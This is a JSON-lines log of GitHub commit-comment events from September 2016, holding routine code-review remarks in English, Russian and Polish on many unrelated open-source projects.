{"id":"4536008570","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950902,"position":362,"line":570,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:04:27Z","updated_at":"2016-09-08T19:04:27Z","body":".setLabels этого метода уже нет :)"}},"created_at":"2016-09-08T19:04:27Z"}
{"id":"4536015198","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950928,"position":365,"line":574,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:05:40Z","updated_at":"2016-09-08T19:05:40Z","body":"почему мы устанавливаем цвет только для пешеходного, а для машин нет?\r\nt_light_men.SetColor(red, imageList1);"}},"created_at":"2016-09-08T19:05:40Z"}
{"id":"4536015554","type":"CommitCommentEvent","actor":{"login":"maparent"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":18950930,"position":4,"line":4,"path":"assembl/static/js/app/views/confirmModal.js","commit_id":"79f9bf52f7ea6b758e379960b5aeca30a1987015","created_at":"2016-09-08T19:05:43Z","updated_at":"2016-09-08T19:05:43Z","body":"The documentation build is broken because of this line. It should go at the end of the comment block, not at the beginning. (Yes, that's obscure.)"}},"created_at":"2016-09-08T19:05:43Z"}
{"id":"4536016569","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18950934,"position":547,"line":1428,"path":"src/ng/directive/ngModel.js","commit_id":"87a2ff76af5d0a9268d8eb84db5755077d27c84c","created_at":"2016-09-08T19:05:51Z","updated_at":"2016-09-08T19:05:51Z","body":"Doesn't this mean that `updateOn: ''` will inherit the parent (or default) value (while previously it would just never be updated)? Shouldn't we document this as another BC?"}},"created_at":"2016-09-08T19:05:51Z"}
{"id":"4536019373","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18950949,"position":51,"line":25,"path":"faq/index.php","commit_id":"3082b992770393ab4d3b5ec7bf7d844c691f3f3b","created_at":"2016-09-08T19:06:23Z","updated_at":"2016-09-08T19:06:23Z","body":"@NapSsst3R формат поправь."}},"created_at":"2016-09-08T19:06:23Z"}
{"id":"4536022311","type":"CommitCommentEvent","actor":{"login":"rowanc1"},"repo":{"name":"simpeg/simpeg"},"payload":{"comment":{"id":18950958,"position":14,"line":89,"path":".travis.yml","commit_id":"9ef71312e6c7e82ca888f0a4100996ca34be075f","created_at":"2016-09-08T19:06:55Z","updated_at":"2016-09-08T19:06:55Z","body":"does this get deployed on master?\r\nmight also want a `--pre` flag to work on pypi so deploy from dev as well?"}},"created_at":"2016-09-08T19:06:55Z"}
{"id":"4536030756","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950990,"position":371,"line":580,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:08:26Z","updated_at":"2016-09-08T19:08:26Z","body":"Немного не понятно зачем выносить тело одной функции в другую функцию. Последняя из которых в свою очередь используется только функцией timer1_Tick. Заставляет бегать глазами"}},"created_at":"2016-09-08T19:08:26Z"}
{"id":"4536030842","type":"CommitCommentEvent","actor":{"login":"markek"},"repo":{"name":"markek/Fable"},"payload":{"comment":{"id":18950991,"position":null,"line":null,"path":null,"commit_id":"b6d136c688f11f8c7894cc6f9b8de649bd7ce20c","created_at":"2016-09-08T19:08:27Z","updated_at":"2016-09-08T19:08:27Z","body":"I moved the string slicing test so that all the sprintf tests are together."}},"created_at":"2016-09-08T19:08:27Z"}
{"id":"4536031946","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18950996,"position":null,"line":null,"path":null,"commit_id":"3b58fe0254ae650d6428c4b7dc240100468047f9","created_at":"2016-09-08T19:08:39Z","updated_at":"2016-09-08T19:08:39Z","body":"@JLHwung That was intentional."}},"created_at":"2016-09-08T19:08:39Z"}
{"id":"4536033246","type":"CommitCommentEvent","actor":{"login":"BodaciousDrake"},"repo":{"name":"strydercorp/documentation"},"payload":{"comment":{"id":18951001,"position":null,"line":null,"path":null,"commit_id":"8adfc6fda2538983699d7ea4301f5c752db73389","created_at":"2016-09-08T19:08:54Z","updated_at":"2016-09-08T19:08:54Z","body":"Why? Are you removing the API, or is this temporary?"}},"created_at":"2016-09-08T19:08:54Z"}
{"id":"4536034770","type":"CommitCommentEvent","actor":{"login":"brianyu28"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":18951009,"position":13,"line":17,"path":"helpers/make.py","commit_id":"ce93e59f6f410e8ba6bafb42c77828ad6192ede7","created_at":"2016-09-08T19:09:13Z","updated_at":"2016-09-08T19:09:13Z","body":"Submitted a PR to address!"}},"created_at":"2016-09-08T19:09:13Z"}
{"id":"4536035664","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"simpeg/simpeg"},"payload":{"comment":{"id":18951013,"position":14,"line":89,"path":".travis.yml","commit_id":"9ef71312e6c7e82ca888f0a4100996ca34be075f","created_at":"2016-09-08T19:09:22Z","updated_at":"2016-09-08T19:09:22Z","body":"I will add the if statement for master after (I am just trying to get it to deploy at all at the moment)... so far no luck (I am not getting past the if statements? ) \r\n![image](https://cloud.githubusercontent.com/assets/6361812/18363008/124bd994-75bd-11e6-9929-4324a9c71ade.png)\r\n"}},"created_at":"2016-09-08T19:09:22Z"}
{"id":"4536037755","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"simpeg/simpeg"},"payload":{"comment":{"id":18951028,"position":14,"line":89,"path":".travis.yml","commit_id":"9ef71312e6c7e82ca888f0a4100996ca34be075f","created_at":"2016-09-08T19:09:47Z","updated_at":"2016-09-08T19:09:47Z","body":"https://travis-ci.org/simpeg/simpeg/jobs/158523124"}},"created_at":"2016-09-08T19:09:47Z"}
{"id":"4536039528","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18951041,"position":44,"line":44,"path":"bootstrap.sh","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T19:10:08Z","updated_at":"2016-09-08T19:10:08Z","body":"Need a closing quote here!\r\n\r\n```\r\n==> default:\r\n==> default: 2016-09-08 18:48:54 (1.10 MB/s) - ‘distribution-karaf-0.4.3-Beryllium-SR3.zip’ saved [298925169/298925169]\r\n==> default: bash: line 30: unexpected EOF while looking for matching `\"'\r\n==> default: bash: line 38: syntax error: unexpected end of file\r\nThe SSH command responded with a non-zero exit status. Vagrant\r\nassumes that this means the command failed. The output for this command\r\nshould be in the log above. Please read the output to determine what\r\nwent wrong.\r\n```"}},"created_at":"2016-09-08T19:10:08Z"}
{"id":"4536041550","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":18951057,"position":4,"line":4,"path":"assembl/static/js/app/views/confirmModal.js","commit_id":"79f9bf52f7ea6b758e379960b5aeca30a1987015","created_at":"2016-09-08T19:10:30Z","updated_at":"2016-09-08T19:10:30Z","body":"Is that documented anywhere, @maparent? That is indeed very obscure. "}},"created_at":"2016-09-08T19:10:30Z"}
{"id":"4536044097","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18951063,"position":3,"line":0,"path":".idea/vcs.xml","commit_id":"49051f13676372a93621279c5499514aee719fcf","created_at":"2016-09-08T19:10:57Z","updated_at":"2016-09-08T19:10:57Z","body":"Ещё придётся удалить уже существующие :)"}},"created_at":"2016-09-08T19:10:57Z"}
{"id":"4536044566","type":"CommitCommentEvent","actor":{"login":"kzidane"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":18951064,"position":13,"line":17,"path":"helpers/make.py","commit_id":"ce93e59f6f410e8ba6bafb42c77828ad6192ede7","created_at":"2016-09-08T19:11:02Z","updated_at":"2016-09-08T19:11:02Z","body":"Thanks, @brianyu28!"}},"created_at":"2016-09-08T19:11:02Z"}
{"id":"4536045827","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18951068,"position":null,"line":null,"path":null,"commit_id":"946ca933a27c705b5226f697f3ae0bcc543a8980","created_at":"2016-09-08T19:11:18Z","updated_at":"2016-09-08T19:11:18Z","body":"`std::deque` was the only STL container used. Its unlikely that its usage might cause any performance issues but it's time to replace it for purity, since it bypasses G_Malloc().\r\n\r\nSome STL algorithms that allocate nothing and have a good estimated performance  (such as `std::push_heap(), std::pop_heap(), std::sort()`) are planned to be kept.\r\n\r\nThe replacement was tested in a dummy project under AddressSanitizer with some dummy code.\r\n"}},"created_at":"2016-09-08T19:11:18Z"}
{"id":"4536053426","type":"CommitCommentEvent","actor":{"login":"jhallard"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":18951090,"position":5,"line":3,"path":"configs/configs.csv","commit_id":"09fd34c598708133d6c63c63f1c829edebfeede8","created_at":"2016-09-08T19:12:44Z","updated_at":"2016-09-08T19:12:44Z","body":"Do these default settings for the D-Link seem okay?"}},"created_at":"2016-09-08T19:12:44Z"}
{"id":"4536054261","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18951092,"position":384,"line":384,"path":"MBINCompiler/Models/Structs/Unfinished/GcAISpaceshipGlobals.cs","commit_id":"132da8c71fceda4304b846f4279e249ac54fff9c","created_at":"2016-09-08T19:12:54Z","updated_at":"2016-09-08T19:12:54Z","body":"done:\r\nhttps://github.com/lobolmart/MBINRawTemplateParser/commit/d4bd6566b1a85030eace8912eba72e96db8e3512\r\n"}},"created_at":"2016-09-08T19:12:54Z"}
{"id":"4536056498","type":"CommitCommentEvent","actor":{"login":"nedkelly"},"repo":{"name":"paularmstrong/swig"},"payload":{"comment":{"id":18951096,"position":null,"line":null,"path":null,"commit_id":"70a1c8899266893ff22354c2426329e306c2f322","created_at":"2016-09-08T19:13:18Z","updated_at":"2016-09-08T19:13:18Z","body":"Hi @paularmstrong, actually https://github.com/node-swig/swig-templates is very active, they have already got the docs back online http://node-swig.github.io/swig-templates and are reviewing new pull requests. I'm sure there will be plenty of interest in keeping swig maintained as it is by far the best JavaScript template engine available, thanks for your contributions in the past. If there is a way to re-enable the issue tracker it would be exceedingly helpful to those of us who would like to continue improving swig-templates. Thanks again for your hard work, Cheers."}},"created_at":"2016-09-08T19:13:18Z"}
{"id":"4536056588","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18951097,"position":null,"line":null,"path":null,"commit_id":"3b58fe0254ae650d6428c4b7dc240100468047f9","created_at":"2016-09-08T19:13:19Z","updated_at":"2016-09-08T19:13:19Z","body":"I think @JLHwung pointed it out because originally it was a unique commit, but I squashed them whilst in the process of removing our names from the original commit message so we didn't get random notifications for each \"new\" mention. "}},"created_at":"2016-09-08T19:13:19Z"}
{"id":"4536057515","type":"CommitCommentEvent","actor":{"login":"vikrant4"},"repo":{"name":"codeoak/appFrontend"},"payload":{"comment":{"id":18951102,"position":null,"line":null,"path":null,"commit_id":"afd1f2511b7c7d4d203ff20e97a35b52d279456f","created_at":"2016-09-08T19:13:30Z","updated_at":"2016-09-08T19:13:30Z","body":"@vishwa9, I've added these images to gitignore so they don't bother us anymore"}},"created_at":"2016-09-08T19:13:30Z"}
{"id":"4536058278","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18951106,"position":349,"line":557,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:13:39Z","updated_at":"2016-09-08T19:13:39Z","body":"шо цэ такэ\r\nКакой мув, чего мув, для чего мув. Еще и снова магические числа :)"}},"created_at":"2016-09-08T19:13:39Z"}
{"id":"4536059063","type":"CommitCommentEvent","actor":{"login":"maparent"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":18951111,"position":4,"line":4,"path":"assembl/static/js/app/views/confirmModal.js","commit_id":"79f9bf52f7ea6b758e379960b5aeca30a1987015","created_at":"2016-09-08T19:13:48Z","updated_at":"2016-09-08T19:13:48Z","body":"It's the jsdoc pattern, but not sure if the hard constraint is part of jsdoc or the jsdoc to sphinx machinery."}},"created_at":"2016-09-08T19:13:48Z"}
{"id":"4536059228","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18951112,"position":null,"line":null,"path":null,"commit_id":"569306422e14ee51a72ae7481006a6a45f378b1a","created_at":"2016-09-08T19:13:49Z","updated_at":"2016-09-08T19:13:49Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3911\n"}},"created_at":"2016-09-08T19:13:49Z"}
{"id":"4536061616","type":"CommitCommentEvent","actor":{"login":"vikrant4"},"repo":{"name":"codeoak/appFrontend"},"payload":{"comment":{"id":18951122,"position":null,"line":null,"path":null,"commit_id":"afd1f2511b7c7d4d203ff20e97a35b52d279456f","created_at":"2016-09-08T19:14:16Z","updated_at":"2016-09-08T19:14:16Z","body":"I added UserService by mistake, wasn't meant to go there"}},"created_at":"2016-09-08T19:14:16Z"}
{"id":"4536063414","type":"CommitCommentEvent","actor":{"login":"dougchestnut"},"repo":{"name":"alibama/DAWG"},"payload":{"comment":{"id":18951126,"position":4,"line":60,"path":"index.html","commit_id":"feabe1e9390286f3dd2f2404b2ff4d2d5e449b9a","created_at":"2016-09-08T19:14:36Z","updated_at":"2016-09-08T19:14:36Z","body":"Disabled shadow dom to make things easier to debug (uses shady dom)"}},"created_at":"2016-09-08T19:14:36Z"}
{"id":"4536064764","type":"CommitCommentEvent","actor":{"login":"wilddom"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18951130,"position":null,"line":null,"path":null,"commit_id":"5e48908535bb93326eba5f51d048d444b7469ce4","created_at":"2016-09-08T19:14:50Z","updated_at":"2016-09-08T19:14:50Z","body":"The update steps are working on postgresql but I had to do some other changes in the table definitions, see #389 "}},"created_at":"2016-09-08T19:14:50Z"}
{"id":"4536066466","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18951134,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-08T19:15:10Z","updated_at":"2016-09-08T19:15:10Z","body":"What did you do during CSE?"}},"created_at":"2016-09-08T19:15:10Z"}
{"id":"4536066734","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18951135,"position":3,"line":0,"path":"app/src/main/AndroidManifest.xml","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-08T19:15:13Z","updated_at":"2016-09-08T19:15:13Z","body":"Да, может как-то надо переназвать package? Хотя и на твоё усмотрение"}},"created_at":"2016-09-08T19:15:13Z"}
{"id":"4536071225","type":"CommitCommentEvent","actor":{"login":"93r"},"repo":{"name":"wbraswell/rperl"},"payload":{"comment":{"id":18951153,"position":null,"line":null,"path":null,"commit_id":"04e37dec0b6ae840054341fda4025b93d0dd3a74","created_at":"2016-09-08T19:16:05Z","updated_at":"2016-09-08T19:16:05Z","body":"Commit says \"Tests, Appveyor, # more useful comment\". This is not meaningful for \"t/13\". I forgot I changed \"t/13\", too. Anyway, the change to it happened and is needed."}},"created_at":"2016-09-08T19:16:05Z"}
{"id":"4536073943","type":"CommitCommentEvent","actor":{"login":"ramereth"},"repo":{"name":"osuosl-cookbooks/osl-app"},"payload":{"comment":{"id":18951158,"position":22,"line":22,"path":"recipes/app2.rb","commit_id":"98994053950ee0fe771cf6b921ff021b85840283","created_at":"2016-09-08T19:16:34Z","updated_at":"2016-09-08T19:16:34Z","body":"You probably only want the iam-* users on app2."}},"created_at":"2016-09-08T19:16:34Z"}
{"id":"4536076172","type":"CommitCommentEvent","actor":{"login":"jlaine"},"repo":{"name":"wichert/pyrad"},"payload":{"comment":{"id":18951164,"position":5,"line":113,"path":"pyrad/tools.py","commit_id":"b4d849b17b4e52fe129b9b7ab9b2dcb22681c18b","created_at":"2016-09-08T19:17:02Z","updated_at":"2016-09-08T19:17:02Z","body":"\"return =\" looks odd"}},"created_at":"2016-09-08T19:17:02Z"}
{"id":"4536076660","type":"CommitCommentEvent","actor":{"login":"93r"},"repo":{"name":"wbraswell/rperl"},"payload":{"comment":{"id":18951168,"position":null,"line":null,"path":null,"commit_id":"d3ea53532d85907d1fbc4fb5f45e5632eea7066b","created_at":"2016-09-08T19:17:08Z","updated_at":"2016-09-08T19:17:08Z","body":"Raised version no. because Appveyor test complained."}},"created_at":"2016-09-08T19:17:08Z"}
{"id":"4536079321","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18951176,"position":7,"line":9,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:17:38Z","updated_at":"2016-09-08T19:17:38Z","body":"в crossroad.h лучше убрать все это добро (переменные и константы) А то они сидят одинокие тут)"}},"created_at":"2016-09-08T19:17:38Z"}
{"id":"4536084007","type":"CommitCommentEvent","actor":{"login":"donaghhorgan"},"repo":{"name":"donaghhorgan/rhythmbox-plugins-open-containing-folder"},"payload":{"comment":{"id":18951192,"position":null,"line":null,"path":null,"commit_id":"4219dea1fedcfe231ff9dd763b36004c43dc64c3","created_at":"2016-09-08T19:18:31Z","updated_at":"2016-09-08T19:18:31Z","body":"I can't reproduce this. For instance, if I open the song \"Gimme Shelter\" by The Rolling Stones, I see `/media/donagh/Files/Music/The Rolling Stones/Let It Bleed`, where `Files` is an external hard disk.\r\n\r\nDo you have an example of a file that this doesn't work for?"}},"created_at":"2016-09-08T19:18:31Z"}
{"id":"4536084054","type":"CommitCommentEvent","actor":{"login":"robintracy"},"repo":{"name":"robintracy/hello-world"},"payload":{"comment":{"id":18951193,"position":5,"line":5,"path":"README.md","commit_id":"db8d44eafb42e992b7e44e855ad8fb857270f3b1","created_at":"2016-09-08T19:18:32Z","updated_at":"2016-09-08T19:18:32Z","body":"Hello World (again)\r\n"}},"created_at":"2016-09-08T19:18:32Z"}
{"id":"4536085737","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18951201,"position":null,"line":null,"path":null,"commit_id":"798470a776c5c35cff5cb3d9327a11cbf98b5365","created_at":"2016-09-08T19:18:50Z","updated_at":"2016-09-08T19:18:50Z","body":"I reverted the commit instead."}},"created_at":"2016-09-08T19:18:50Z"}
{"id":"4536086524","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/NOW"},"payload":{"comment":{"id":18951204,"position":null,"line":null,"path":null,"commit_id":"e222baa5bfdb26e28536d24826faf6d3468f017f","created_at":"2016-09-08T19:18:59Z","updated_at":"2016-09-08T19:18:59Z","body":"The comedic irony of locking a conversation about locks..."}},"created_at":"2016-09-08T19:18:59Z"}
{"id":"4536093363","type":"CommitCommentEvent","actor":{"login":"CreativeMechanics"},"repo":{"name":"olesensam/Old-Flame_Design-Team"},"payload":{"comment":{"id":18951226,"position":null,"line":null,"path":null,"commit_id":"c9e2f3e11446b853420dc9fcebae3189fa1c4042","created_at":"2016-09-08T19:20:15Z","updated_at":"2016-09-08T19:20:15Z","body":"This file is meant to be animated in, and contains all the characters and objects in their correct places\r\n"}},"created_at":"2016-09-08T19:20:15Z"}
{"id":"4536094387","type":"CommitCommentEvent","actor":{"login":"mikaturk"},"repo":{"name":"mikaowen/case-simulator"},"payload":{"comment":{"id":18951229,"position":null,"line":null,"path":null,"commit_id":"a39ac8cdbf026150a0fe90eb98a7b1a08b54d1a8","created_at":"2016-09-08T19:20:26Z","updated_at":"2016-09-08T19:20:26Z","body":"noice\r\n"}},"created_at":"2016-09-08T19:20:26Z"}
{"id":"4536095914","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"stefansaraev/TB"},"payload":{"comment":{"id":18951235,"position":null,"line":null,"path":null,"commit_id":"63d10b25895a1cf8aec4c867962a03d6f9b88992","created_at":"2016-09-08T19:20:42Z","updated_at":"2016-09-08T19:20:42Z","body":"Thanks, certainly an odd issue, but if it's possible..."}},"created_at":"2016-09-08T19:20:42Z"}
{"id":"4536096116","type":"CommitCommentEvent","actor":{"login":"born2webdesign"},"repo":{"name":"mate-desktop/libmateweather"},"payload":{"comment":{"id":18951236,"position":null,"line":null,"path":null,"commit_id":"835055e0d0b950d3f66ad236de7e40942f6f7d8e","created_at":"2016-09-08T19:20:45Z","updated_at":"2016-09-08T19:20:45Z","body":"@tx0h That would be a step in the right direction – but why not make this configurable in the settings?\r\nEither a text input field with a default server or a dropdown list of preconfigured servers (preferably with the option to add more servers)?\r\nhttps://developer.yahoo.com/weather/ looks promising?\r\nOr regional services like http://wetter-api.de"}},"created_at":"2016-09-08T19:20:45Z"}
{"id":"4536096151","type":"CommitCommentEvent","actor":{"login":"CreativeMechanics"},"repo":{"name":"olesensam/Old-Flame_Design-Team"},"payload":{"comment":{"id":18951237,"position":null,"line":null,"path":null,"commit_id":"c9e2f3e11446b853420dc9fcebae3189fa1c4042","created_at":"2016-09-08T19:20:45Z","updated_at":"2016-09-08T19:20:45Z","body":"This is just a temporary file to help us animate. Until the main room is finished, we will be using this as a frame for the animations"}},"created_at":"2016-09-08T19:20:45Z"}
{"id":"4536097172","type":"CommitCommentEvent","actor":{"login":"dwradcliffe"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18951242,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-08T19:20:58Z","updated_at":"2016-09-08T19:20:58Z","body":"We don't remove the sha256 when gems are yanked."}},"created_at":"2016-09-08T19:20:58Z"}
{"id":"4536098384","type":"CommitCommentEvent","actor":{"login":"rjnordeen"},"repo":{"name":"strydercorp/documentation"},"payload":{"comment":{"id":18951247,"position":null,"line":null,"path":null,"commit_id":"8adfc6fda2538983699d7ea4301f5c752db73389","created_at":"2016-09-08T19:21:13Z","updated_at":"2016-09-08T19:21:13Z","body":"ya we shoudl not remove this. "}},"created_at":"2016-09-08T19:21:13Z"}
{"id":"4536099770","type":"CommitCommentEvent","actor":{"login":"JLHwung"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18951251,"position":null,"line":null,"path":null,"commit_id":"3b58fe0254ae650d6428c4b7dc240100468047f9","created_at":"2016-09-08T19:21:26Z","updated_at":"2016-09-08T19:21:26Z","body":"@MikeMcQuaid Yep, I just add some comment so that people won't get confused as it does not state \"also removes build with libressl\" on the commit message. Anyway I am anticipating nginx landing 1.11.4 so more people can use chacha20-poly1305 when linked with OpenSSL@1.1."}},"created_at":"2016-09-08T19:21:26Z"}
{"id":"4536107803","type":"CommitCommentEvent","actor":{"login":"limyz"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18951274,"position":null,"line":null,"path":null,"commit_id":"4d3d88891893532f291a4965482c1d511e12052d","created_at":"2016-09-08T19:22:57Z","updated_at":"2016-09-08T19:22:57Z","body":"Awesome work. Maybe I'll just work on issues, just feel free to assign me."}},"created_at":"2016-09-08T19:22:57Z"}
{"id":"4536110272","type":"CommitCommentEvent","actor":{"login":"skyarkhangel"},"repo":{"name":"skyarkhangel/Hardcore-SK"},"payload":{"comment":{"id":18951279,"position":null,"line":null,"path":null,"commit_id":"9a374dc0bd4faf3b1346678615fd0291310a1fd6","created_at":"2016-09-08T19:23:29Z","updated_at":"2016-09-08T19:23:29Z","body":"Yep. Plz repeat :/"}},"created_at":"2016-09-08T19:23:29Z"}
{"id":"4536110378","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18951281,"position":396,"line":605,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T19:23:31Z","updated_at":"2016-09-08T19:23:31Z","body":"ее мб и не надо фолсить.\r\nПусть она сработает с задержкой (в идеале) если ее нажали когда зеленый у пешеходного уже не горит, но времени прошло мало для загорания снова."}},"created_at":"2016-09-08T19:23:31Z"}
{"id":"4536113365","type":"CommitCommentEvent","actor":{"login":"Rufflewind"},"repo":{"name":"haskell/directory"},"payload":{"comment":{"id":18951288,"position":13,"line":1325,"path":"System/Directory.hs","commit_id":"1ec1ea8e4210d55d8d6e0e5fc8dd543340004b92","created_at":"2016-09-08T19:24:04Z","updated_at":"2016-09-08T19:24:04Z","body":"@hvr Oops sorry. Will fix that."}},"created_at":"2016-09-08T19:24:04Z"}
{"id":"4536114594","type":"CommitCommentEvent","actor":{"login":"lbialobrzeski"},"repo":{"name":"lbialobrzeski/Hello-World"},"payload":{"comment":{"id":18951291,"position":null,"line":null,"path":null,"commit_id":"57da0ac0ee45c591afa91b547349e26b8962f542","created_at":"2016-09-08T19:24:17Z","updated_at":"2016-09-08T19:24:17Z","body":"zmiany"}},"created_at":"2016-09-08T19:24:17Z"}
{"id":"4536115793","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":18951293,"position":null,"line":null,"path":null,"commit_id":"ff0c0b645cc1448959126185bb2fafe41cf0bddf","created_at":"2016-09-08T19:24:33Z","updated_at":"2016-09-08T19:24:33Z","body":"Will this allow us to use namespaces inside the build?"}},"created_at":"2016-09-08T19:24:33Z"}
{"id":"4536116583","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18951296,"position":null,"line":null,"path":null,"commit_id":"861b8011dee37619b51dd1be9309a3870fd90f0b","created_at":"2016-09-08T19:24:43Z","updated_at":"2016-09-08T19:24:43Z","body":"nice catch"}},"created_at":"2016-09-08T19:24:43Z"}
{"id":"4536119997","type":"CommitCommentEvent","actor":{"login":"Divran"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":18951301,"position":null,"line":null,"path":null,"commit_id":"e0e74df40ff2797cdbcd14e1dc9113aa7bde436f","created_at":"2016-09-08T19:25:22Z","updated_at":"2016-09-08T19:25:22Z","body":"It doesn't really matter because the edits you make are not saved, so the next time you click that function to view its description, your changes will no longer be there."}},"created_at":"2016-09-08T19:25:22Z"}
{"id":"4536123481","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18951311,"position":null,"line":null,"path":null,"commit_id":"569306422e14ee51a72ae7481006a6a45f378b1a","created_at":"2016-09-08T19:26:02Z","updated_at":"2016-09-08T19:26:02Z","body":"fast-forwarding develop-2.2 to borshop-integration-1476-zl-correct-cap-for-second-crdt = 7311ed8a"}},"created_at":"2016-09-08T19:26:02Z"}
{"id":"4536125293","type":"CommitCommentEvent","actor":{"login":"93r"},"repo":{"name":"wbraswell/rperl"},"payload":{"comment":{"id":18951316,"position":null,"line":null,"path":null,"commit_id":"04e37dec0b6ae840054341fda4025b93d0dd3a74","created_at":"2016-09-08T19:26:24Z","updated_at":"2016-09-08T19:26:24Z","body":"Keep in mind that changes to \"t/13\" will require a change in \"docs/devs_getting_started.txt\", too. The line \"In t/13 only you will need to disable the constant 'PATH_PRECOMPILED' by changing it's value to end with an invalid path such as '/RPerl/FOO'.\r\nYou may safely ignore any warnings about \"/RPerl/FOO\" being an invalid path while t/13 is running.\" has become OBSOLETE."}},"created_at":"2016-09-08T19:26:24Z"}
{"id":"4536125865","type":"CommitCommentEvent","actor":{"login":"al-s"},"repo":{"name":"Goles/mopub-ios-sdk"},"payload":{"comment":{"id":18951318,"position":null,"line":null,"path":null,"commit_id":"75cb8ba9a0881094696e069e8d05864d42aa64de","created_at":"2016-09-08T19:26:30Z","updated_at":"2016-09-08T19:26:30Z","body":"This is just by my own expirience in async programming with callbacks. Usually we request to do something and then wait that callback will be called on success or on error, but only once. And if in this case the callback is called more than once, it often leads to serious problems.\r\n\r\nMoPub documentation does not say anything about whether it is allowed to call both didAdLoad and didFailToLoadAd in reponse to one \"load ad\" call. Maybe it is safe, maybe not.\r\n\r\nIn Android they fall back to another provider immediately after we reported that ad is not loaded. Then, after they got a reply from another provider, they call onInvalidate() on our adapter to indicate that they do not expect any actions from us (\"Implementers should cancel any pending requests\"). So our adapter still has some time to load ad, but I don't think that reporting that ad is loaded will change something at this moment. Perhaps if another provider fails too, we will get a second chance and the adapter will be reused, that's why they do not call onInvalidate() immediately."}},"created_at":"2016-09-08T19:26:30Z"}
